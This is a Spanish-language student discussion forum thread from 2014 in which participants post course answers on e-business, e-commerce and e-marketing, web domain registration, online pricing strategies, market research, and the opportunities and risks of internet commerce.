Mensaje  Bartolo perez carreño el Mar Ago 26, 2014 2:44 pm

Los negocios electronicos son actividades comerciales que realizan las empresas gracias a la incorporacion de las nuevas tecnoligias de la informacion y al uso de los nuevos sistemas que permiten una mayor competencia en este mundo tan cambiante y tan evolucionado.

El consumidor en linea es la persona o empresa que adquiere un bien o servicio para satisfacer una necesidad en particular.

Bartolo perez carreño
Invitado


Volver arriba Ir abajo

Re: 1.- Mercadotecnia y evolución de los negocios electrónicos

Mensaje  por Idalia Pastenes el Mar Ago 26, 2014 4:14 pm

¿Explique qué es un Dominio Web y cómo y dónde se realizan los registros de dicho dominio?
R=  Es una red de identificación asociada a un grupo de dispositivos o equipos conectados a la red Internet. El propósito principal de los nombres de dominio en Internet y del sistema de nombres de dominio (DNS), es traducir las direcciones IP de cada nodo activo en la red, a términos memorizables y fáciles de encontrar. Esta abstracción hace posible que cualquier servicio (de red) pueda moverse de un lugar geográfico a otro en la red Internet, aun cuando el cambio implique que tendrá una dirección IP diferente.
Sin la ayuda del sistema de nombres de dominio, los usuarios de Internet tendrían que acceder a cada servicio web utilizando la dirección IP del nodo. Además, reduciría el número de webs posibles, ya que actualmente es habitual que una misma dirección IP sea compartida por varios dominios.
El procedimiento es el siguiente:
• Elegir un dominio.
• Verificar la disponibilidad del nombre de dominio deseado en algún registrador.
• Ingresar los datos personales.
• Elegir la cantidad de tiempo que el dominio permanecerá registrado.
• Pagar el dominio, normalmente con tarjeta de crédito (o también por transferencia bancaria)
• Una vez arrendado, el ahora registrante del dominio debe configurarlo con la URL a la cual re direccionar, IP del servidor al que encontrará mediante la DNS, servidor DNS usada por este.
• El registrante del dominio debe esperar un tiempo para que el dominio sea reconocido en todos los servidores de Internet. Para los dominios .com y .net la demora es entre 4 y 8 horas, y para otros es generalmente entre 24 y 48 horas. En ese período:
• El registrador contacta con ICANN y realiza el proceso de forma transparente para el registrante.
• Se avisa al registrante que el dominio fue registrado.
• El nuevo dominio funciona, y resuelve a la IP apropiada en el servidor DNS usado, pero no en el resto de servidores DNS del mundo. Poco a poco se va propagando el cambio al resto de servidores (propagación DNS). Como cada uno tiene distintos tiempos de actualización y parámetros de caché distintos, pasan varias horas hasta que todos los servidores DNS del mundo conocen cómo hacer la resolución del dominio.
• La página ya es accesible mediante un nombre de dominio desde cualquier computadora.


¿Detectar y describir al menos dos oportunidades y riesgos de utilizar Internet como medio para realizar negocios?
R= Blogs de temas con alta demanda: Un blog es la forma más sencilla de empezar un negocio en internet. Básicamente, escribe artículos de un tema en específico, e insertar publicidad de Google Ausense para generar sus ingresos. Entre los temas que mejor pagan están seguros, dietas, préstamos, hosting, abogado, software, crédito

Venta de productos en Mercado libre: Otra oportunidad de negocios en internet fácil, es la venta de productos en

Mercado Libre. Esta empresa parecida a eBay de Estados Unidos, está posicionada en Latinoamérica como la más conocida para ofertar productos en internet. ciertamente tiene diversas desventajas, como los altos costos de comisión y publicación, así como la posibilidad de fraude, pero es una buena plataforma para empezar su negocio web.

Promoción de servicios locales: Otra oportunidad de negocios de servicios, es promover a empresas locales para búsquedas muy específicas. Por ejemplo, digamos que una empresa de abogados de Caracas quiere promocionarse en internet. Usted puede ofrecer el servicio de posicionamiento web específico para esa ciudad, a fin de que la página del negocio se encuentre cuando la gente busque “abogados en Caracas”.

Riesgos relacionados con la información: Las personas frecuentemente necesitamos Información para realizar nuestras actividades, y muchas veces la podemos obtener en Internet de manera más rápida, cómoda y económica que en el "mundo físico". No obstante hemos de considerar posibles riesgos:

Acceso a información poco fiable: Existe mucha información errónea y poco actualizada en Internet, ya que cualquiera puede poner información en la red. Su utilización puede dar lugar a múltiples problemas: desde realizar mal un trabajo académico hasta arruinar una actuación empresarial.

Dispersión, pérdida de tiempo: A veces se pierde mucho tiempo para localizar la información que se necesita. Es fácil perderse navegando por el inmenso mar informativo de Internet lleno de atractivos "cantos de sirena". Al final el trabajo principal puede quedar sin hacer.

Acceso de los niños a información inapropiada: Existen webs que pese a contener información científica, pueden resultar inapropiadas y hasta nocivas (pueden afectar a su desarrollo cognitivo y afectivo) para niños y menores por el modo en el que se abordan los temas o la crudeza de las imágenes (sexo, violencia, drogas, determinados relatos históricos y obras literarias...). La multimedialidad de Internet puede hacer estos contenidos aún más explícitos e impactantes.

por Idalia Pastenes
Invitado


Volver arriba Ir abajo

EXPLIQUE AL MENOS DOS CONCEPTOS Y APLICACIONES DEL E-MARKETING

Mensaje  ITHZEL URIBE MENDOZA el Mar Ago 26, 2014 4:22 pm


EXPLIQUE AL MENOS DOS CONCEPTOS Y APLICACIONES DEL E-MARKETING


CONCEPTO

• Se dice que el e-Marketing es un proceso mediado por las Tecnologías de Información y Comunicación (TIC)  con unos propósitos estrechamente relacionados entre sí, para contribuir a los objetivos de la empresa.
• Común mente el e-Marketing se entiende como  una forma de comunicación comercial a través del correo electrónico dirigido a usuarios específicos con el fin de adquirir nuevos clientes, mejorar la relación de su negocio y fomentar la fidelidad hacia nuestros productos.
• También nos habla de las campañas de publicidad hechas por email u otros medios con fines comerciales a través de internet, así como el estudio de estrategias para la promoción y venta utilizando medios electrónicos como son los banners, chat, redes sociales, etc.
Es viable decir que el E-Marketing debería preparar el camino de nuestras acciones para establecer nuestros procedimientos empresariales en Internet.

APLICACIONES
Las principales actividades en las que se aplica el e-marketing para lograr las metas y objetivos establecidos por la empresa como son reconocimiento de sus productos, algo nivel de ventas y pos ventas y estos son:
• Investigación comercial
• Planificación
• Comunicación
• Organización de ventas
• Distribución
Con el empleo de las TIC, el e-Marketing ha evolucionado hacia cuatro C: cliente, costo, convergencia, comunicación.

ITHZEL URIBE MENDOZA
Invitado


Volver arriba Ir abajo

Explique o mencione o señale al menos una diferencia entre e- Business, e-Commerce y e- Marketing

Mensaje  Ameyalli Quezada el Mar Ago 26, 2014 6:49 pm

Hola! buenas tardes compañeros, yo les hablare sobre las diferencias entre el e-business, e-commerce y el e-marketing. Primero les daré unos conceptos y posteriormente hablare sobre su diferencia.
CONCEPTOS:
E-business: es una actitud empresarial a favor del uso de la tecnología de Internet opuesta a la actitud tradicional de definir negocios en el ámbito tradicional en donde los procesos se orientan desde y para Internet. Solicitan de la empresa una actitud de investigación de perfiles, canales nuevos y de la influencia de dicha tecnología en los colaboradores y sistemas a utilizar.

E-commerce: alude a la actividad del negocio en sí misma, dentro de Internet, más no a la actitud de la empresa con respecto de la tecnología. Consiste en la ejecución vía selección de medios, para establecer acciones de comercio, compra, venta, negociaciones, vinculaciones comerciales o similares tanto como en la definición de enfoque de perfil objetivo, esta vez, llamados usuarios.

E-Marketing: es la traducción del "Marketing tradicional" en términos de Internet, donde es necesario añadir el conocimiento que se tiene sobre las herramientas disponibles, perfiles de usuarios y tendencias de comunicación, para establecer conceptos que alcancen a dichos usuarios de forma efectiva mediante acciones de E-commerce, y con una orientación "E-business". Es viable decir que el E-Marketing debería preparar el camino de nuestras acciones para establecer nuestros procedimientos empresariales en Internet.
DIFERENCIA:
La diferencia entre estas radica en: E-commerce va enfocado a la comercialización (compra, venta y entrega) y el uso de internet para hacer transacciones comerciales. E-marketing se enfoca a la propagación o difusión del sitio web (campañas electrónicas y posicionamiento empresarial). E-business se enfoca en lo que son las actividades empresariales (e-mail, soporte técnico, educación/capacitación, transacciones bancarias, comunicación con empleados, proveedores, usuarios, clientes y distribuidores, etc.), y hace posible que las transacciones sean mediante el S.I.

Bien compañeros, después de esta breve información compartida creo que entender estas diferencias y encontrar en Internet la manifestación de cada una de ellas no sólo nos ayudará a saber si estamos en el camino correcto para consolidar nuestra actitud frente a la tecnología y convertirnos en un E-business, también nos ayudará a seleccionar los medios adecuados para accionar nuestro plan de negocios (E-commerce) y saber aplicar las estrategias adecuadas en Internet (E-Marketing).
Very Happy

Ameyalli Quezada
Invitado


Volver arriba Ir abajo

Explique qué es un Dominio Web y cómo y donde se realizan los registros de dicho dominio.

Mensaje  Ameyalli Quezada el Mar Ago 26, 2014 8:09 pm

Hola compañeros! Nuevamente yo, aquí dejando mi segunda participación, espero sea de su agrado.
Concepto de Dominio Web:
Dominio es la extensión que nos sirve para reconocer a una página web de las demás es decir su nombre, es decir el dominio es como un identificador que no puede ser repetido hasta que sea eliminado o ya no esté en función-caducado- y así se podría reutilizar ese dominio.

Un dominio de Internet es un nombre base que agrupa a un conjunto de equipos o dispositivos y que permite proporcionar nombres de equipo más fácilmente recordables en lugar de una dirección IP numérica. Permiten a cualquier servicio (de red) moverse a otro lugar diferente en la topología de Internet, que tendrá una dirección IP diferente.

Es el nombre que le dimos a nuestra organización en internet. Ese nombre será el que difunda nuestra imagen corporativa y por lo tanto su elección es de vital importancia como signo de distinción de su empresa, marca y oferta de productos o servicios.
Ventajas de un Dominio:

• Imagen: El nombre de la empresa aparece en el primer nivel, en lugar de estar vinculado a otra. Una empresa que dispone de un nombre de dominio dará una imagen de empresa actual adaptada a las nuevas tendencias tecnológicas.

• Flexibilidad: para el alojamiento en cualquier proveedor. El dominio propio le permitirá cambiar de proveedor de forma totalmente transparente y sin que ello afecta a su negocio.

• Direcciones de correo en su dominio: El dominio propio ofrece la posibilidad de tener direcciones de correo con su propio nombre. Por ejemplo, contratando un dominio h t t p : //w w w .empresa. es, se dispondrá de direcciones de correo en la forma usuario @ empresa. es. Al igual que los dominios, si usted cambia de proveedor de servicios, se podrá llevar las cuentas con usted.
Registro del  Dominio Web:
El registro de dominios es el proceso por el cual una persona pasa a tener el control sobre un nombre de dominio a cambio de pagar una cierta cantidad de dinero a un registrador. El La Corporación de Internet para los Nombres y Números Asignados (ICANN) es quien regula las normas de registro de dominio web.

PROCEDIMIENTO:

1. Elegir un dominio.
Verificar la disponibilidad del nombre de dominio deseado en algún registrador.
Ingresar los datos personales
Elegir la cantidad de tiempo que el dominio permanecerá registrado.
Pagar el dominio, normalmente con tarjeta de crédito (o también por transferencia)

2. Una vez comprado, el ahora dueño del dominio (registrante) debe configurarlo con la URL a la cual Re direccionar, IP del servidor al que encontrará mediante la DNS, servidor DNS usada por este.

3. El dueño del dominio debe esperar un tiempo para que el dominio sea reconocido en todos los servidores de Internet. Para los dominios .com y.net la demora es entre 4 y 8 horas, y para otros es generalmente entre 24 y 48 horas. En ese período:

*El registrador contacta con ICANN y realiza el proceso de forma transparente para el registrante.

*Se avisa al registrante que el dominio fue registrado.

*El nuevo dominio funciona, y resuelve a la IP apropiada en el servidor DNS usado, pero no en el resto de servidores DNS del mundo. Poco a poco se va propagando el cambio al resto de servidores (propagación DNS). Como cada uno tiene distintos tiempos de actualización y parámetros de caché distintos, pasan varias horas hasta que todos los servidores DNS del mundo conocen cómo hacer la resolución del dominio.

4. La página ya es accesible mediante un nombre de dominio desde cualquier computadora.


Los datos necesarios para registrar un dominio son:
• Registrador oficial de dominios: Empresa registradora oficial inscrita en ICANN la cual se encarga de preservar los datos de los registros.

• Propietario del dominio: Persona o entidad que figura como propietario y legítimo dueño por el periodo de registro.

• Contacto administrativo: Persona o entidad designada por el propietario que figura como administrador de los datos del dominio en favor del propietario.

• Contacto técnico: Persona o entidad que se encarga de la manutención de los números DNS del dominio para su correcto funcionamiento y enlace en la red.


• Contacto de facturación: Persona o entidad que se encargará de realizar el pago por las correspondientes renovaciones del dominio.


• DNS (Domain Name Servers) (Servidor de Nombres de Dominio): Estos números (mínimo 2) figuran en el registro de los dominios y muestran las direcciones IPs de los servidores que se harán cargo de las peticiones al dominio y de redirigir las mismas a donde proceda según la naturaleza de cada petición.

_______________________________________________________________________________________

“Explique al menos dos conceptos y aplicaciones del E-Marketing.”

--DEFINICIÓN:
*Es un sistema para vender productos y servicios a un público seleccionado que utiliza Internet y los servicios comerciales en línea mediante herramientas y servicios de forma estratégica y congruente con el programa general de Marketing de la empresa.
*E-marketing son todas las acciones que se realizan online para un negocio con el objetivo de encontrar, atraer, ganar y retener clientes.
En el marketing online existen cuatro puntos que son muy importantes y que se debe velar por su cumplimiento antes del lanzamiento de cualquier campaña web:
Usabilidad: Es la eficiencia con la que se ofrece al usuario el servicio o información que este requiere. Cualquier website enfocado en estrategias de marketing online debe ser altamente usable, es decir, que su diseño sea lo suficientemente intuitivo para que desde un niño hasta un anciano no exista problemas navegando en dicho website.
Interfaz: Una interfaz correctamente diseñada permite resaltar el contenido nuevo y relevante para el usuario de una forma clara y sin extravagancias dentro del sitio web. Al implementar una atractiva interfaz, los usuarios se sienten más atraidos por el producto o la información que se desee transmitir.
Motores de búsqueda: Son los encargados de ordenar la información que existe en internet. Para publicitarse a través de un motor de busqueda existen dos sistemas: SEO y SEM. El primero se refiere al posicionamiento organico o natural y el segundo a aparecer en los resultados pagando (Llamado también PPC o enlaces patrocinados).
Promoción: A través de los canales exclusivos de internet: Email Marketing, E-advertising (Banners), Social media marketing (Blogs, Twitter, Facebook, etc).

--APLICACIÓN:
En cuanto a la implementación de una estrategia de Marketing Online, los cuatro elementos indispensables para desarrollar una campaña de forma correcta son:
a) Tener un websit
b) Llevar tráfico a dicho website
c) Utilizar el posicionamiento en buscadores
d) Hacer eco de la campaña en Medios Sociales.

__________________________________________________________________________________________

“Explique cómo puede usted llevar a cabo una investigación de mercados en línea.”

Cuando se realiza una investigación de mercados en Internet estamos conociendo que ocurre en este entorno virtual. Estos acontecimientos pueden afectar negativamente o positivamente a la empresa.
Cuando se piensa en desarrollar una estrategia de marketing, la investigación de mercados es un elemento esencial que empresa debe llevar a cabo.
La investigación de mercados en Internet permite identificar y analizar la información del mercado con la intención de ayudar en la toma de decisiones de la organización.
El Internet puede servir como fuente de información secundaria en las estrategias de marketing que impulsa la empresa, permite la recolección de información mediante el uso de encuestas, grupos de enfoque, entre otros elementos.
Entre los motivos por el cual es necesaria la investigación de mercados se encuentran:
 Ayuda a comprender las tendencias actuales y futuras del mercado
 Brinda información sobre los mercados objetivos
 Permite identificar mercados y clientes potenciales
 Sirve de base para la elaboración de estrategias de marketing
 Ayuda a las empresas a evaluar sus servicios
 Permite conocer a la competencia
 Entre otros ítems.

Los buscadores recomendados para realizar una investigación de mercados en Internet son:
Google: h t t p : / / w w w. google. com
Yahoo: h t t p : / / w w w. yahoo. com
BING: h t t p :/ / w w w. bing. com
Ask: h t t p : / / w w w. ask. com
La investigación de mercados en Internet se debe prestar atención a las fuentes de información y los resultados obtenidos. En el caso de necesitar estadísticas oficiales en conveniente visitar las páginas de los gobiernos del país que se trate.
Si realizas una búsqueda en Internet la duración que tendrá depende de la importancia que tenga lo que se busque, es por eso que se recomienda prestar especial atención a los resultados obtenidos en las primeras cinco páginas del buscador, porque comúnmente la información más relevante se encuentra en esas posiciones para la investigación que se desarrolle. Si las palabras utilizadas no dieron los resultados esperados es conveniente colocar nuevas palabras claves en el cuadro de búsqueda.
Como reflexión final podemos decir que Internet es un nuevo camino para que las empresas transiten y puedan desarrollar un sistema efectivo y a menor coste.
Los canales online son cada vez más utilizados y resultan ser tan efectivos como los canales de comercialización tradicionales de la empresa.

Nos Vemos Compañeros!!

Atte. Ameyalli Quezada Gutiérrez.


Última edición por Ameyalli Quezada el Miér Ago 27, 2014 10:09 pm, editado 1 vez

Ameyalli Quezada

Mensajes : 6
Fecha de inscripción : 26/08/2014

Ver perfil de usuario

Volver arriba Ir abajo

Estrategia para Establecer Precios en Línea

Mensaje  miriam alvarez el Mar Ago 26, 2014 9:14 pm

Buenas noches compañeros esta es mi segunda participación en el foro con el tema ya mencionado primero les pondré un pequeño concepto de precio y por ultimo una estrategia.

precio: Es una variable fundamental en la mercadotecnia en línea que genera beneficios, por cual también puede tener pérdidas que afecten a la marca y a la percepción misma del producto, y debe ser el resultado de una estrategia. Las organizaciones tienden a comercializar amplias gamas de productos para poder cubrir todos los segmentos potenciales, por ello, es frecuente encontrar que un mismo producto tenga diferente precio en función del público objetivo al que se dirige, del lugar donde se compra o de diferentes situaciones que hacen variar el precio.

Estrategia: la estructura debe ser flexible para que puedan ser modificados los precios en el caso de que cambien los objetivos o la situación competitiva de la mercadotecnia en línea
. study bounce

miriam alvarez
Invitado


Volver arriba Ir abajo

Explique o mencione o señale al menos una diferencia entre e- Business, e-Commerce y e- Marketing

Mensaje  l. alan pineda valdez el Mar Ago 26, 2014 11:22 pm

Ola compañeros de acuerdo a lo que nosotros investigamos sobre qué diferencias hay entre, e-business, e-commerce y e-marketing, pues a veces se llegan a confundir e-commerce y e-business y son utilizados como sinónimos.
El e-business es cualquier actividad empresarial no sólo de compra y venta la cual se efectúa a través de Internet, dando servicio a los clientes o colaborando con socios comerciales, donde la interacción es permitida por tecnología cono es el internet. El e-business  tiene cinco puntos denominados las 5 c´s: contenido, contexto, comunidad, comercio y colaboración que caracterizan una adecuada integración del contenido e-business, y solicitan de la empresa una actitud de investigación de perfiles, canales nuevos y de la influencia de dicha tecnología en los colaboradores y sistemas a utilizar.

el e-commerce,es usado por las  empresas que desean vender sus productos y servicios a través de Internet publicándolos en una página web  donde puedan tener acceso los clientes potenciales y que realicen una compra electrónica generalmente usando una tarjeta de bancaria. Ayuda  establecer acciones de comercio, compra, venta, negociaciones, vinculaciones comerciales o similares tanto como en la definición de enfoque de perfil objetivo, esta vez, llamados usuarios.
E-Marketing es una parte de las actividades de e-business de una empresa.
Consiste en el uso de la tecnología de la información para crear, comunicar y entregar valor a los clientes, así como  administrar las relaciones con los clientes para beneficio de la empresa es necesario añadir el conocimiento que se tiene sobre las herramientas disponibles, perfiles de usuarios y tendencias de comunicación, podríamos decir que e-Marketing debería preparar el camino de nuestras acciones para establecer nuestros procedimientos empresariales en Internet. El e-Marketing debería preparar el camino de nuestras acciones para establecer nuestros procedimientos empresariales en Internet.

Diferencias entre e-commerce,  e-business  y  E-Marketing
El  e-commerce  se encarga de cubrir  los procesos por los cuales se llega a clientes y proveedores: como son las ventas que es su principal estrategia, marketing, logística y servicio al cliente. Así mismo se encarga de  analizar el uso de internet para incrementar las ventas y mejorar las estrategias de comercialización.
Mientras  que e-business  se basa en la expansión de mercado agilizando y automatizando el proceso de pedidos, ofreciendo mayor horario de servicio mejorando considerablemente los precios que ello implica logrando que el capital e inventario sea mínimo
También se encarga de mejor control de visitas al sitio y nivel de servicio logrando llegar a un público especializado logrando una comunicación directa con el consumidor.

EMarketing  sirve  para crear, comunicar y entregar valor a los clientes, así como  administrar las relaciones con los clientes para beneficio de la empresa
Entender estas diferencias y encontrar en Internet la manifestación de cada una de ellas no sólo nos ayudará a saber si estamos en el camino correcto para consolidar nuestra actitud frente a la tecnología y convertirnos en un e-business, también nos ayudará a seleccionar los medios adecuados para accionar nuestro plan de negocios e-commerce y saber aplicar las estrategias adecuadas en Internet e-marketing.
Bueno espero que  si me falto mencionar algún punto importante lo comenten.. Rolling Eyes

A por cierto integrantes Guillermina Agustín Márquez y Luis Alan Pineda Valdez

l. alan pineda valdez
Invitado


Volver arriba Ir abajo

que es un dominio web y su forma de registro

Mensaje  jose manuel romero v. el Mar Ago 26, 2014 11:31 pm

El propósito principal de los nombres de dominio en Internet y del sistema de nombres de dominio (DNS), es traducir las direcciones IP de cada nodo activo en la red, a términos memorizables y fáciles de encontrar. Esta abstracción hace posible que cualquier servicio (de red) pueda moverse de un lugar geográfico a otro en la red Internet, aún cuando el cambio implique que tendrá una dirección IP diferente.1
Sin la ayuda del sistema de nombres de dominio, los usuarios de Internet tendrían que acceder a cada servicio web utilizando la dirección IP del nodo (por ejemplo, sería necesario utilizar h t t p : / / 1 9 2 . 0 . 3 2 . 1 0  en vez de h t t p : / / e x a m p l e . c o m ). Además, reduciría el número de webs posibles, ya que actualmente es habitual que una misma dirección IP sea compartida por varios dominios.
El procedimiento es el siguiente:
Elegir un dominio.
Verificar la disponibilidad del nombre de dominio deseado en algún registrador.
Ingresar los datos personales.
Elegir la cantidad de tiempo que el dominio permanecerá registrado.
Pagar el dominio, normalmente con tarjeta de crédito (o también por transferencia bancaria)
Una vez arrendado, el ahora registrante del dominio debe configurarlo con la URL a la cual redireccionar, IP del servidor al que encontrará mediante la DNS, servidor DNS usada por este.
El registrante del dominio debe esperar un tiempo para que el dominio sea reconocido en todos los servidores de Internet. Para los dominios .com y .net la demora es entre 4 y 8 horas, y para otros es generalmente entre 24 y 48 horas. En ese período:
El registrador contacta con ICANN y realiza el proceso de forma transparente para el registrante.
Se avisa al registrante que el dominio fue registrado.
El nuevo dominio funciona, y resuelve a la IP apropiada en el servidor DNS usado, pero no en el resto de servidores DNS del mundo. Poco a poco se va propagando el cambio al resto de servidores (propagación DNS). Como cada uno tiene distintos tiempos de actualización y parámetros de caché distintos, pasan varias horas hasta que todos los servidores DNS del mundo conocen cómo hacer la resolución del dominio.
La página ya es accesible mediante un nombre de dominio desde cualquier computadora.

jose manuel romero v.
Invitado


Volver arriba Ir abajo

este es mi segundo reactivo, saludos de parte de romeron89

Mensaje  jose manuel romero v. el Mar Ago 26, 2014 11:44 pm

1.- Selección del objetivo de la fijación del precio. La compañía primero tiene que decidir qué quiere realizar con un producto en particular. Si ha seleccionado su mercado objetivo y su posición en éste, entonces su estrategia de mezcla de mercadotecnia, incluido el precio, será bastante sencilla. La estrategia de fijación de precios se determina en gran medida por la colocación en el mercado.
Cuanto más claros sean los objetivos de una empresa, más fácil es fijar el precio. Cada precio posible tendrá un efecto diferente en objetivos como beneficios, ganancias de las ventas y participación en el mercado.

Una compañía puede procurar cualquiera de los seis objetivos fundamentales a través de la fijación de precios:

Máxima utilidad actual: muchas compañías estiman la demanda y costos asociados con precios alternativos y seleccionan el precio que genera la máxima utilidad actual, flujo de efectivo o tasa de rentabilidad sobre la inversión. El aumento al máximo de la utilidad actual presenta problemas. Supone que la empresa conoce su demanda y funciones del costo; en realidad, es difícil estimarlos. Asimismo, la compañía pone énfasis en el desempeño financiero actual en lugar del desempeño a largo plazo. Por último, la compañía ignora el efecto de otras variables de la combinación mercantil, las reacciones de los competidores y las restricciones legales sobre el precio.

jose manuel romero v.
Invitado


Volver arriba Ir abajo

DETECTAR Y DESCRIBIR AL MENOS DOS OPORTUNIDADES Y RIESGOS DE UTILIZAR INTERNET COMO MEDIO PARA REALIZAR NEGOCIOS

Mensaje  ITHZEL URIBE MENDOZA el Miér Ago 27, 2014 2:30 pm

DETECTAR Y DESCRIBIR AL MENOS DOS OPORTUNIDADES Y RIESGOS DE UTILIZAR INTERNET COMO MEDIO PARA REALIZAR NEGOCIOS


  • OPORTUNIDADES



Base de clientes potenciales
No hace mucho tiempo, si una persona iniciaba un negocio, podía colocar algunos anuncios a nivel local con la esperanza de lograr un renombre en la zona. La Internet ha cambiado esta práctica por completo. Una presencia en Internet le proporciona al instante un público global a una empresa. Clientes de todo el mundo pueden obtener información y comprar sus productos y servicios. La población de clientes potenciales es interminable.

Una tienda sin horario de cierre
La red mundial o www (por sus siglas en inglés) funciona las 24 horas del día, los siete días de la semana. Las empresas que venden productos prefabricados son las que más se benefician de esta ventaja. Al crear una tienda en Internet, estos empresarios tienen una tienda virtual en la cual nunca se cierran las puertas, proporcionándoles la posibilidad de que literalmente, puedan ganar dinero mientras duermen.

Oportunidades de extender las redes de contactos
La Internet ha creado una comunidad global de iguales. En el pasado, la única opción de un negocio consistía en unirse a una cámara de comercio local con el fin de establecer contactos y aprender de sus colegas empresarios. Sin embargo, las salas de chat y los foros de Internet, han elevado la noción de una comunidad a un nuevo nivel.

Rentabilidad
Quizás la mayor ventaja del uso de Internet en las empresas es su rentabilidad. Abrir y mantener una tienda virtual cuesta una fracción del presupuesto necesario para abrir y mantener una tienda física. La publicidad en Internet es más barata que en los medios tradicionales, y permite que los empresarios puedan llegar a un grupo demográfico más específico. También permite que las empresas operen sin necesidad de tener en cuenta los costos de traslado. En el sector minorista, por ejemplo, un propietario de una tienda puede navegar y comprar bienes para revenderlos a proveedores de todo el mundo, sin tener que abandonar la comodidad del escritorio de su computadora.


  • RIESGOS


Más representativas de participar en el Comercio Electrónico:
‡
• Carencia de infraestructura de distribución y entrega de pedidos
• Capacidad de procesamiento confidencial de la información
• Detección de diferencias culturales
‡
Muchos conceptos que se dan por sentado en la economía tradicional desaparecen ante el entorno virtual:

• Atención persona a persona
• Seguridad de la forma de pago
• La entrega en mano del cliente
• Implican riesgos de tipo financiero y legal

COMO CONCLUSION TENGO QUE LA LLEGADA DE INTERNET EN MUCHOS SENTIDOS HA NIVELADO EL CAMPO DE JUEGO PARA LAS PEQUEÑAS EMPRESAS, PUES PUEDEN COMPETIR CON LAS GRANDES CORPORACIONES, TAMBIEN  HA PERMITIDO QUE LAS NUEVAS EMPRESAS AUMENTEN SUS INGRESOS, ALCANZANDO UNA POBLACIÓN DE CLIENTES POTENCIALES NUNCA ANTES VISTO.
UN EMPRESARIO QUE COMPRENDE LOS BENEFICIOS DE UTILIZAR LA INTERNET PARA LOS NEGOCIOS, Y APLICA LAS PRÁCTICAS, PUEDE MAXIMIZAR EL POTENCIAL DE SU ORGANIZACIÓN.

-- - - - - - - - - - - - - -  - - - -  - - - - -- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

SISTESIS DE LA EVOLUCION DE LOS NEGOCIOS ELECTRONICOS Y UNA BREVE IMPORTANCIA DE LA MERCADOTECNIA ELECTRONICA

Evolución de los mercados electrónicos

A finales de la década de los noventa, muchos expertos albergaban grandes expectativas sobre las Tecnologías de la Información (TI) y, en especial, sobre el negocio electrónico:

Existía la creencia de que la eficiencia que podía alcanzarse mediante el intercambio electrónico de información persuadiría a la mayoría de los compradores y vendedores a usar este nuevo canal de ventas. Como esto no ha sucedido, se ha culpado al boom de las puntocom, un período en el que muchas compañías de TI atrajeron inicialmente unas elevadas inversiones para después quebrar por falta de pago por sus clientes.

El hecho es que fueron creados muchos mercados por terceros independientes, que acabaron cerrando por no conseguir la participación del suficiente número de usuarios. Hecho lamentable, ya que sus soluciones eran a menudo técnicamente muy buenas.

Los otros grupos que gozaban de las mejores oportunidades fueron los mercados electrónicos patrocinados por una determinada industria y los de ámbito privado. Estas plataformas o bien estaban respaldadas y financiadas por un sector industrial o eran operadas y gestionadas por una compañía importante, normalmente un comprador.

Como la mayoría de los sectores centrados en las TI, los mercados electrónicos también han experimentado cambios vertiginosos, con tanta rapidez como lo ha hecho la terminología. Por tanto, a una Pyme interesada le cuesta a menudo entender la oferta existente y lo que hacen los mercados electrónicos para diferenciarse unos de otros. Se emplean términos como ‘horizontal’, ‘vertical’ y ‘tipo mariposa’, y expresiones como e-marketplace, eMarket, plataformas electrónicas de negocio, negocio electrónico y comercio electrónico están acrecentando el número de palabras casi similares, lo que dificulta la comprensión de la realidad subyacente.

El crecimiento del comercio electrónico es lento, aunque constante [C], al ejercer cada vez más presión los principales socios comerciales, fundamentalmente los compradores, y ser necesarios mayores conocimientos y capacidad

Importancia de la mercadotecnia electrónica
La Mercadotecnia Electrónica es el estudio de la implementación de estrategias que permitan la promoción y venta de productos y servicios, a través de medios electrónicos, principalmente Internet.
El mundo de los negocios  ha sido profundamente afectado por los avances tecnológicos. Quizá el cambio más dramático en los negocios debido a la tecnología se ha dado en el campo de ventas y mercadotecnia. La mercadotecnia tradicional estaba limitada a métodos de publicidad tales como avisos exteriores, medios impresos, televisión y radio. Con la llegada de Internet, los clientes que buscan productos y servicios ahora llegan masivamente a Internet usando los motores de búsqueda para encontrar lo que quieren en la mercadotecnia global en línea. Es esta dinámica la que obliga a los negocios a rediseñar los presupuestos de mercadotecnia, reduciendo gastos en métodos tradicionales mientras que incrementan el dinero dirigido a Mercadotecnia por Internet.
Las oportunidades de empresas y consumidores han ido en aumento gracias a las posibilidades de comerciar que ofrece Internet, concepto que tratamos en el presente monográfico, centrándonos en lo que hoy en día denominamos comercio electrónico o e-commerce

La Mercadotecnia en Internet es un arsenal de potentes estrategias que implementan las últimas actividades de la mercadotecnia en el fértil y global campo de Internet.



Última edición por ITHZEL URIBE MENDOZA el Lun Sep 08, 2014 9:53 pm, editado 4 veces

ITHZEL URIBE MENDOZA

Mensajes : 13
Fecha de inscripción : 26/08/2014

Ver perfil de usuario

Volver arriba Ir abajo

Estrategias de precios en lines

Mensaje  Bartolo perez carreño el Miér Ago 27, 2014 3:12 pm

Una buena estrategia para establecer el precio en linea es la reduccion de areas funcionales en la entrega del producto o servicio al consumidor final, ya que por medio del internet se pueden dar precios mas accesibles y los productos siguen teniendo la misma calidad, es decir se crea una relacion mas corta entre quien produce y quien consume el producto ya elaborado, y esto aplicado en las empresas representa un ahorro muy bueno que se vera reflejado en sus utilidades.

Bartolo perez carreño
Invitado


Volver arriba Ir abajo

Diferencias entre e-commerce, e-marketing y e-business

Mensaje  Miriam Pineda Peñaloza el Miér Ago 27, 2014 8:05 pm

Hola compañeros, después de leer el cuaderno de trabajo de Mercadotecnia Electrónica y me queda más claro los conceptos de e-marketing, e-business y e-commerce, me parece encontrar otras diferencias entre estos. Por lo tanto primero explicare un poco acerca de ellos para luego dar las diferencias.

Para mí, e-marketing se refiere a las estrategias de métodos y técnicas que se realizan para las campañas de publicidad, promoción de un producto o servicio, empleando medios electrónicos con disposición de Internet.

Por lo tanto e-commerce  son las actividades comerciales como son venta y compra así como la entrega de productos o servicios para el comercio de estos, mediante el uso y la aplicación de Internet.

Y e-business realiza acciones empresariales utilizando las TIC´s y el Internet como medio para capacitación, intercambio de productos, etc.


Asimismo estos tres conceptos van ligados entre si ya que se vinculan por lo que se destacan por ser actividades para la venta de productos  por medio de las TIC´s e Internet. Pero aunque son semejantes no olvidemos que hay diferencias y estas son:


E-marketing se dirige a la publicidad y promoción de los productos o servicios.



• E-commerce comprende la compra, venta y entrega, es decir, la comercialización del producto o servicio.



• E-business expresado más a la actividad empresarial, trabajando dentro de la empresa para tener buen rendimiento.

Miriam Pineda Peñaloza

Mensajes : 17
Fecha de inscripción : 27/08/2014

Ver perfil de usuario

Volver arriba Ir abajo

